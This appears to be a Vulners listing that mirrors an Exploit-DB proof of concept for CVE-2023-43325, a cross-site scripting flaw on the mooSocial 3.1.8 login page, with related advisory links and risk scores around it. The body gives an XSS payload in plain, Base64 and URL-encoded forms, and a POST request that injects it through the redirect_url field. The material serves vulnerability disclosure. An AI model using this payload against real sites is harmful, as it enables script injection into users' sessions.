Lucene search
K

mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page

🗓️ 02 Feb 2024 00:00:00Reported by Astik RawatType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 444 Views

mooSocial 3.1.8 XSS on User Login Page, allows execution of arbitrary code

Related
Code
ReporterTitlePublishedViews
Family
0day.today
mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page Vulnerability
5 Feb 202400:00
zdt
GithubExploit
Exploit for Cross-site Scripting in Moosocial
16 Sep 202301:05
githubexploit
ATTACKERKB
CVE-2023-43325
26 Sep 202300:15
attackerkb
CNNVD
mooSocial Cross-Site Scripting Vulnerability
25 Sep 202300:00
cnnvd
CVE
CVE-2023-43325
25 Sep 202300:00
cve
Cvelist
CVE-2023-43325
25 Sep 202300:00
cvelist
Nuclei
MooSocial 3.1.8 - Cross-Site Scripting
6 Jun 202603:01
nuclei
NVD
CVE-2023-43325
26 Sep 202300:15
nvd
OSV
CVE-2023-43325
26 Sep 202300:15
osv
Prion
Cross site scripting
26 Sep 202300:15
prion
Rows per page
# Exploit Title: mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page
# Date: 26 September 2023
# Exploit Author: Astik Rawat (ahrixia)
# Vendor Homepage: https://moosocial.com
# Software Link: https://travel.moosocial.com/
# Version: 3.1.8
# Tested on: Windows 11
# CVE : CVE-2023-43325


Description:

A Cross Site Scripting (XSS) vulnerability exists on the user login page in mooSocial which is a social network website.

Steps to exploit:
1) Go to Login page on the website and login with credentials.
2) Insert your payload in the "data[redirect_url]" - POST Request 
	Proof of concept (Poc):
	The following payload will allow you to execute XSS - 
	
	Payload (Plain text): 
	test"><img src=a onerror=alert(1)>test 

	Payload (Base64 encoded) : 
	dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q=
	
	Final Payload (Base64+Url encoded): 
	dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d

	POST Request on /moosocial/users/login (POST REQUEST DATA ONLY): 
	[_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[redacted]&data%5Bremember%5D=0]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Feb 2024 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
EPSS0.16187
SSVC
444